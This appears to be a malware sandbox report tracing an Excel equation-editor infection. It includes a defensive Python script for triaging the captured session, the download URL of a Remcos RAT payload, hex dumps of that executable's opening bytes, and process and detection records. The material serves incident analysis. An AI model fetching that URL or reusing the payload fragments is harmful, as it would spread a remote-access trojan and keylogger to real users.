Dec 10, 2024 07:04:55.038240910 CET | 192.168.2.22 | 8.8.8.8 | 0x710e | Standard query (0) | www.grupodulcemar.pe | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 07:04:55.616468906 CET | 8.8.8.8 | 192.168.2.22 | 0x710e | No error (0) | www.grupodulcemar.pe | grupodulcemar.pe | (none) | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 07:04:55.616468906 CET | 8.8.8.8 | 192.168.2.22 | 0x710e | No error (0) | grupodulcemar.pe | (none) | 161.132.57.101 | A (IP address) | IN (0x0001) | false
                                                    • www.grupodulcemar.pe
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 161.132.57.101 | 443 | 3680 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
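The session above is the whole download chain in one record: the Office Equation Editor (EQNEDT32.EXE, PID 3680) opens TCP/443 to 161.132.57.101 and, as the request/response dump that follows shows, speaks cleartext HTTP on that port with an Internet Explorer 7 User-Agent, receiving an MZ-headed file served as application/x-msdownload. The script below is an added example, not part of the Joe Sandbox report: it takes the session row, the HTTP request and response heads, and the first 32 bytes of the body (all transcribed from this report) and returns the findings a responder would want confirmed before acting on the capture. The process and browser name lists, the TLS-port set, the benign control session (chrome.exe to a TEST-NET address) and the truncated TLS ClientHello bytes are assumptions constructed for the example.

```python
"""Triage of a captured HTTP session (added example, not report code).

Flags: an Office helper process with no business on the network, cleartext
HTTP carried on a TLS port, a browser User-Agent sent by a non-browser, and a
PE image in the response body.  All sample data is embedded; nothing is fetched.
"""
from ntpath import basename as win_basename

# Assumed policy lists (not from the report); extend to taste.
NO_NETWORK_PROCESSES = {"eqnedt32.exe"}        # equation editor never needs sockets
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
TLS_PORTS = {443, 8443}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ")

# Session, request head, response head and first 32 body bytes transcribed from the report.
SESSION = {
    "src": "192.168.2.22", "sport": 49163, "dst": "161.132.57.101", "dport": 443,
    "pid": 3680,
    "process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
}
REQUEST = (
    b"GET /HKP098767890HJ.exe HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
    b"SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    b".NET4.0C; .NET4.0E)\r\n"
    b"Host: www.grupodulcemar.pe\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 10 Dec 2024 06:04:57 GMT\r\n"
    b"Server: Apache\r\n"
    b"Last-Modified: Mon, 09 Dec 2024 15:39:04 GMT\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"Content-Length: 832512\r\n"
    b"Connection: close\r\n"
    b"Content-Type: application/x-msdownload\r\n\r\n"
)
BODY_PREFIX = bytes.fromhex(
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"
)

# Constructed benign control (assumption): a browser opening a real TLS session.
BENIGN_SESSION = {
    "src": "192.168.2.22", "sport": 50000, "dst": "203.0.113.10", "dport": 443,
    "pid": 4242, "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
}
# TLS record header (handshake, version 3.x) followed by a ClientHello type byte; truncated.
TLS_CLIENT_HELLO = bytes.fromhex("16030100 05010000 0103")


def looks_like_tls_client_hello(data: bytes) -> bool:
    """Content type 0x16 (handshake), major version 0x03, handshake type 0x01."""
    return len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03 and data[5] == 0x01


def parse_http_message(raw: bytes):
    """Return (start_line, {lower-cased header: value}) for one HTTP head block."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage(session: dict, request: bytes, response: bytes, body_prefix: bytes) -> dict:
    """Return the process name, the reconstructed URL, Content-Length and a findings list."""
    findings = []
    proc = win_basename(session["process"]).lower()
    if proc in NO_NETWORK_PROCESSES:
        findings.append("office_helper_process_network")
    result = {"process": proc, "findings": findings, "url": None, "content_length": None}
    if looks_like_tls_client_hello(request) or not request.startswith(HTTP_METHODS):
        return result                      # encrypted or unknown protocol: nothing more to read
    req_line, req_hdrs = parse_http_message(request)
    _status, resp_hdrs = parse_http_message(response)
    _method, path, _version = req_line.split(" ", 2)
    host = req_hdrs.get("host", session["dst"])
    # Scheme is http regardless of the port: that is the point of the check below.
    result["url"] = f"http://{host}:{session['dport']}{path}"
    if session["dport"] in TLS_PORTS:
        findings.append("cleartext_http_on_tls_port")
    if req_hdrs.get("user-agent", "").startswith("Mozilla/") and proc not in BROWSERS:
        findings.append("browser_user_agent_from_non_browser")
    if (body_prefix.startswith(b"MZ")
            or resp_hdrs.get("content-type") == "application/x-msdownload"
            or path.lower().endswith(".exe")):
        findings.append("pe_download")
    if "content-length" in resp_hdrs:
        result["content_length"] = int(resp_hdrs["content-length"])
    return result


if __name__ == "__main__":
    print("report:", triage(SESSION, REQUEST, RESPONSE, BODY_PREFIX))
    print("benign:", triage(BENIGN_SESSION, TLS_CLIENT_HELLO, b"", b""))
```

The URL the script reconstructs is http://www.grupodulcemar.pe:443/HKP098767890HJ.exe, with an explicit http scheme: a proxy or IDS rule that treats destination port 443 as TLS and skips payload inspection would never see the GET line or the MZ header, so the indicator to share is host plus port plus path, not an https URL. The body check is deliberately redundant (magic bytes, Content-Type, and file extension) because a server can lie about any one of them.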
Timestamp | Bytes transferred | Direction | Data
2024-12-10 06:04:57 UTC | 325 | OUT | GET /HKP098767890HJ.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.grupodulcemar.pe
Connection: Keep-Alive
2024-12-10 06:04:57 UTC | 223 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 06:04:57 GMT
Server: Apache
Last-Modified: Mon, 09 Dec 2024 15:39:04 GMT
Accept-Ranges: bytes
Content-Length: 832512
Connection: close
Content-Type: application/x-msdownload
                                                    2024-12-10 06:04:57 UTC7969INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}
                                                    2024-12-10 06:04:57 UTC8000INData Raw: b4 d5 8b 1d 36 b1 97 6c 02 10 01 99 21 56 c3 17 c1 44 30 d8 a8 22 15 d1 8c 09 14 dc 5c 54 44 f7 09 68 ca e0 ea 45 e8 2b c0 f1 88 81 e0 d8 a4 c8 42 c4 e7 63 3c b8 3b d0 23 7d ec 62 98 e5 e0 8c 17 08 4e 27 be 4f 6c 22 26 33 ef c3 c4 f1 8e 78 85 af 74 17 c0 78 20 3d 3b 26 dc c0 06 e7 b8 2c d2 63 29 12 6c 78 09 3c f4 c6 d4 d0 f0 b7 db 2e 9a 88 45 fa 04 fb 8d 85 d4 ff fe ff d8 ff a7 46 c1 ee 18 a3 e3 34 06 f9 95 27 62 b4 d2 6b 7d 23 30 60 ea 96 e2 5f 99 d6 68 64 b3 f0 fe 00 f2 52 90 47 ee ed 9c c2 3b c7 b0 38 6c fa 50 51 68 43 f7 bc 7f 75 09 f8 19 62 81 84 5a cb a0 57 ee 8c eb 5e a2 30 e4 13 91 f0 34 f9 d5 be 5c 93 fd 4f e1 60 fc f4 d9 1b d8 c3 1d 6b c8 8a b0 5a 3d b5 85 7e 1a 7c 2a f9 29 27 8f 80 7d fb 64 70 f7 f7 5d a4 12 2c 2a 42 08 29 d1 80 3d d1 00 75 0a
                                                    Data Ascii: 6l!VD0"\TDhE+Bc<;#}bN'Ol"&3xtx =;&,c)lx<.EF4'bk}#0`_hdRG;8lPQhCubZW^04\O`kZ=~|*)'}dp],*B)=u
                                                    2024-12-10 06:04:57 UTC8000INData Raw: 7b fe 02 74 09 22 e5 6a 02 5e eb e0 84 eb dc 18 34 c0 9f db 07 ee 0f eb da 38 01 74 ec c8 46 eb c5 db 5c 01 a6 27 57 fd 9a eb ca 46 7c 70 77 70 03 74 b1 1e af 11 c7 eb 9d 21 33 f6 80 5d e8 01 71 de 60 77 50 97 10 06 c1 18 29 b0 a7 9e 55 3e 19 39 03 ac 43 b8 9c a0 5d a9 84 04 5f 43 20 ef ac 13 dd 55 77 0b 3b 98 91 57 05 65 1d ab 76 40 55 9a 70 c6 78 0d 0a 0c 77 27 71 16 0a 00 42 55 cd 2a 1c 00 c1 80 4b 0e e3 a0 86 32 06 71 c7 a4 83 1e 2b 50 6e 17 22 3b 05 29 7f 6a 09 17 c2 a3 7e fc 81 fc 63 c3 70 06 76 a3 72 ce e0 27 80 0f 03 1c 55 ec 18 e0 17 38 03 8a 39 77 20 0f 87 52 86 ed d2 f8 1a 8e 8d 4f 18 35 9c c7 45 bd 03 60 04 ca 24 28 1a ab 81 f6 57 4e 4e bf 33 2d 94 c2 8e 05 f5 11 2b b0 d6 fd 0d c1 e0 04 03 1d dc ff fc b8 3c 3d 24 36 12 7b 61 1c 08 da c8 49 a8
                                                    Data Ascii: {t"j^48tF\'WF|pwpt!3]q`wP)U>9C]_C Uw;Wev@Upxw'qBU*K2q+Pn";)j~cpvr'U89w RO5E`$(WNN3-+<=$6{aI
                                                    2024-12-10 06:04:57 UTC8000INData Raw: db eb 15 e3 06 18 8d cf 06 18 0c 68 a2 7f 49 fe 41 00 e5 33 2f d2 0a e3 01 68 0b 30 76 8b eb 7c 26 90 df 6c 4b 0e f0 75 19 6e 30 22 db 3b d2 65 c0 02 26 72 0e bc 36 30 a4 e1 a0 61 64 f1 1e 48 64 1c b9 7c 06 39 1c 18 c7 fd 38 ac a4 19 a4 18 38 18 08 3c bb 7e bc 2d 00 46 88 06 18 18 57 dd d6 0d 88 08 0e 00 4d ce 4c 9d b0 ea 87 41 96 bd 9c 60 55 4e c6 53 b1 2e 2b ef 75 f2 96 90 d6 d7 64 26 4c e8 8b 6a a0 7a 35 08 04 f4 e7 78 0a 84 49 f6 13 e6 09 42 40 57 e1 a9 b0 b8 07 18 c4 7c c5 87 66 5d 20 f8 5c c2 7d 54 7b 67 a1 b5 31 53 65 92 41 53 78 59 74 54 94 04 92 9e fb f3 7a a1 32 16 a4 57 72 57 5b 72 68 01 65 98 ff 47 e0 30 74 17 02 80 04 34 85 78 cd 4c 83 05 87 c5 b0 03 2b 00 5c a8 0e af 12 be 0d ba f3 96 70 62 8d eb 07 89 32 2b b9 e1 bb 14 59 85 6b 61 cf 0f 87
                                                    Data Ascii: hIA3/h0v|&lKun0";e&r60adHd|988<~-FWMLA`UNS.+ud&Ljz5xIB@W|f] \}T{g1SeASxYtTz2WrW[rheG0t4xL+\pb2+Yka
                                                    2024-12-10 06:04:57 UTC8000INData Raw: b9 99 8c 3a 1f 28 26 70 cb 9f 8d 04 36 90 21 30 40 75 e0 3c 08 46 0c 73 10 0e 20 0b 7f 01 18 0c 4c c1 e1 02 51 65 d8 06 61 36 72 e4 06 2e 5a 28 4f 14 e9 76 ea 8b 4f c1 cc 30 98 a0 48 68 97 54 0e 0d 1b c1 02 4f 4f e4 0c f7 21 0f 8e 6f 62 23 a4 56 38 0f f2 1c 86 02 07 ff 75 0c cf 20 a5 5e b2 9a 14 ba 06 e0 fe 0b 8b aa 29 3b 39 75 e8 76 2e 90 4c 5b 06 79 60 bf 16 34 32 06 db ba 8d 17 5a 72 d3 80 c6 11 82 3f e7 d1 a3 8f 17 a3 48 c0 1f b5 c6 8b 1f 7a c0 c1 a5 cb 10 f6 0c 43 16 38 2f 30 5c d6 53 0b a4 36 d2 32 24 4a 14 09 ae 0b cd 1b 79 97 10 6c d1 2c d0 d8 0d 6f 19 ff c4 65 8d 48 ff 4a 75 1f 56 c5 55 b0 b0 b4 46 25 28 2f dc 74 73 86 45 37 8d 56 82 17 3b 35 9f 41 40 e5 7f 4b 85 f6 7e 47 c1 e6 04 03 35 3c c5 b8 d0 ab d4 38 0f 01 9f 8e 21 04 0f 35 7a b6 a1 1d 7f
                                                    Data Ascii: :(&p6!0@u<Fs LQea6r.Z(OvO0HhTOO!ob#V8u ^);9uv.L[y`42Zr?HzC8/0\S62$Jyl,oeHJuVUF%(/tsE7V;5A@K~G5<8!5z
                                                    2024-12-10 06:04:57 UTC8000INData Raw: 15 59 3b 23 b3 8c 31 2c 1c 26 18 19 2e 2f 97 97 28 6c 04 34 dc 02 7c 19 b9 8c 5c dd 88 d8 94 de a7 35 72 f4 ac 4f bc 50 3a 23 b3 39 51 74 0d 80 8c 01 f3 68 b0 96 c0 3d 94 21 2c 1f 9e 2a d2 28 00 01 2f ef e5 39 54 18 0c 1a 5c 14 18 17 a8 7b 11 18 79 2a 24 78 0c 1c f2 46 de c8 30 90 14 38 cc 2a 3c 91 e7 ca f3 19 d0 40 0c 48 96 48 18 79 5e 9e 98 4c 42 85 54 ec 79 5e de 39 0e 58 a6 5c 1b 1c 60 de c8 c8 1b 40 38 64 68 10 14 6c 70 d4 79 5e 18 bc 70 2a 9e 91 37 72 56 78 38 14 84 84 90 b3 2e f2 46 f0 a6 98 6d 9c 2b 60 69 10 19 79 bc a0 a4 b5 a8 1a 8a fc 18 08 92 b0 01 ff a1 54 18 f6 b6 65 1c 6a 2a 58 66 39 6c f1 11 84 02 cf 83 7c c6 14 19 f8 4d e1 b6 d2 6a 29 03 ee dc b3 20 8c 4a 91 23 6c 2a 79 90 49 c6 77 18 79 1e 74 76 89 98 02 2b 24 54 d1 f8 e8 26 e0 11 a8 6b
                                                    Data Ascii: Y;#1,&./(l4|\5rOP:#9Qth=!,*(/9T\{y*$xF08*<@HHy^LBTy^9X\`@8dhlpy^p*7rVx8.Fm+`iyTej*Xf9l|Mj) J#l*yIwytv+$T&k
                                                    2024-12-10 06:04:57 UTC8000INData Raw: 36 37 38 39 3a 3b 3c 3d 02 3e 3f 3e 40 41 4d ff ff de 42 43 09 47 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 66 50 4d 6d 16 98 51 66 40 7c 8b fe 9a 2e c2 4d 19 01 09 0b 4e 8f 6c 3c 9b 66 60 ac 74 5a 29 81 ff f6 83 3f ff 74 34 56 1c 39 17 7f 4e ff 76 24 7a 03 5c 69 bd 0a 20 0b 46 2c 82 52 ff 36 fe 63 e0 30 0b 9b 46 28 80 88 37 03 cf ed ab 20 62 83 66 2c 00 31 de 84 83 96 96 10 3b 50 04 3e 2c 73 42 38 34 8c 4e c0 81 d4 23 e5 34 80 c9 b8 58 1f 4c da c6 99 95 51 67 67 ba 02 52 f8 92 fa e1 f5 53 56 52 8f 53 98 0f 57 af 45 d8 91 bc ac 55 f3 43 e4 42 12 8f 05 c2 b3 01 d3 00 cc 12 d2 5d 2a 53 d2 10 a8 e6 fc 96 b7 40 0d 86 ef 80 4b 03 04 7b 04 84 24 1a 5c 10 89 7b a6 97 6f 37 f1 dc 02 44 30 0b 28 20 81 2a 3c 08 30 0e 6a 83 5d 5b b5 b3 b7 14 79 a2 3a 5c ca 72 86 ae db 18
                                                    Data Ascii: 6789:;<=>?>@AMBCGDEFGHIJKLMNOfPMmQf@|.MNl<f`tZ)?t4V9Nv$z\i F,R6c0F(7 bf,1;P>,sB84N#4XLQggRSVRSWEUCB]*S@K{$\{o7D0( *<0j][y:\r
                                                    2024-12-10 06:04:57 UTC8000INData Raw: cc 53 ab 58 d8 a1 77 8b 1d 0a 6e 81 4f ed a7 01 75 d6 04 2d 52 1a c0 8f 8d 84 d4 c6 b3 c1 1e bd dc 0f c4 75 a7 6a 3d 4e cc ef 41 77 f7 80 16 01 df 61 75 94 25 34 4b 79 48 8d a9 d1 eb a3 7e c8 07 6a 07 e8 d2 94 aa b0 05 db 55 8d 38 d3 f8 03 a4 de 67 ce ab 7a cc 8a 44 40 c1 15 2c d3 f6 d1 4e c9 ce 94 8e 45 19 12 f8 50 65 21 a5 9e 5d c8 94 78 04 74 65 e2 d9 19 92 8b 72 0d 6e 9b 11 ff 9b 77 e8 6a 6a 5e be 70 5a ca 06 6a 10 56 fc 12 70 f2 76 09 43 fe 6f 38 b0 62 35 90 7d fc 6a 21 59 66 2b c8 66 03 f9 7b 15 9c 6f ff 28 0f 87 84 0b 59 59 4f e9 f3 fb bd 3b f9 74 6b 4c 23 74 65 0a 25 74 5f 27 74 d4 81 e0 41 ec 2c 08 94 85 83 e0 9c 62 70 39 0c 2c 6d ac 5c 84 84 78 ff 3c e7 b4 ac d1 34 14 32 11 f8 5a 83 c2 d4 58 c0 2c 4c b0 98 f0 21 70 2f e4 85 70 24 0d 76 35 f7 bb
                                                    Data Ascii: SXwnOu-Ruj=NAwau%4KyH~jU8gzD@,NEPe!]xternwjj^pZjVpvCo8b5}j!Yf+f{o(YYO;tkL#te%t_'tA,bp9,m\x<42ZX,L!p/p$v5
                                                    2024-12-10 06:04:58 UTC8000INData Raw: d4 84 80 5d 88 c8 41 1e c3 8c 17 90 02 94 0a 9b cb 33 32 98 9c f0 a8 27 05 e4 90 43 2e ac b0 b4 cf c8 77 31 bd 85 bc c0 fc 0e b9 6c 2e cc 26 e8 d0 d4 39 e4 90 43 d8 dc e0 b9 fc b7 19 e4 02 0c 71 f0 00 08 37 3f f4 39 54 c7 0e f8 13 fc 53 0f 00 fc f7 66 07 0f 04 21 08 84 30 13 14 00 08 02 b7 0e 69 8b b4 c1 12 1c 20 cf c8 21 c7 85 24 28 2c 48 1c 72 79 2e 38 d8 3c 40 19 e4 21 87 44 48 02 4c 97 cd e5 19 50 60 5c 04 09 60 1e 72 c8 21 64 68 6c 01 5c 9e 91 41 70 74 78 80 0e 39 e4 f2 59 84 88 8c 33 32 c8 43 90 03 94 98 c8 83 8b cb 90 a4 a8 47 0b a8 21 87 1c 72 ac b0 b4 6d 2e cf c8 b8 bc a0 c8 09 19 21 87 1c f2 85 cc d0 d4 cb 33 72 c8 d8 dc e0 b8 21 87 5c 9e ec 7a f0 f4 5e 9e 1c e4 f8 02 fc 03 10 00 10 04 48 ef eb 7b d4 13 10 5e fb 13 0e f2 90 b6 c1 12 18 1c 01 20
                                                    Data Ascii: ]A32'C.w1l.&9Cq7?9TSf!0i !$(,Hry.8<@!DHLP`\`r!dhl\Aptx9Y32CG!rm.!3r!\z^H{^
                                                    2024-12-10 06:04:58 UTC8000INData Raw: cd 15 e7 1a 1d 1e 03 0b 50 36 19 cd 66 b3 7d 0c 6c 1e 10 73 14 b8 18 ef 0b cf f3 3c 9b d4 0f dc 21 57 3d 45 b3 d9 6c 36 13 8a 17 c0 0a a6 0e ae ed 79 9e 67 12 f3 29 0f 17 5c c6 16 c6 f3 3c 9b 92 09 78 90 c5 fa e8 52 c6 4f 51 66 8b 1e 66 22 e2 66 72 36 14 1a d1 f8 48 6e 2b 05 23 8d 6a 8a fe 77 d1 9b 32 12 36 f0 56 5f bf 4b e8 1e b0 42 50 09 4c 74 05 6a 18 58 5e c3 87 b0 7d 1a d6 c0 0c 6a 0c a8 c4 23 e1 df d0 60 78 fc 83 65 e4 9e 22 13 e8 3e 12 56 82 23 1c 84 88 99 40 41 04 ca 53 3a 33 7c 77 23 7e 8b c6 0c 79 41 08 2c 5b 1c f8 99 b0 30 09 53 e3 3c 83 a8 4f 43 b3 f4 a0 f4 34 04 5f 4c 67 18 c7 02 42 fc 56 08 0d 8d cc 82 00 b2 40 65 34 78 0c 70 76 50 4f a0 19 01 c2 5f 2c 47 04 59 3b f0 73 47 ff 91 f0 44 e8 10 02 c2 fc 18 65 17 08 7c c6 72 0d 50 53 3a 78 60 5f
                                                    Data Ascii: P6f}ls<!W=El6yg)\<xROQff"fr6Hn+#jw26V_KBPLtjX^}j#`xe">V#@AS:3|w#~yA,[0S<OC4_LgBV@e4xpvPO_,GY;sGDe|rPS:x`_

                                                    Target ID:1
                                                    Start time:01:04:25
                                                    Start date:10/12/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                    Imagebase:0x13fd30000
                                                    File size:28'253'536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:2
                                                    Start time:01:04:52
                                                    Start date:10/12/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:01:04:58
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\kudo.exe"
                                                    Imagebase:0x800000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 58%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:01:04:59
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\kudo.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 58%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:01:05:00
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:01:05:01
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:01:05:02
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
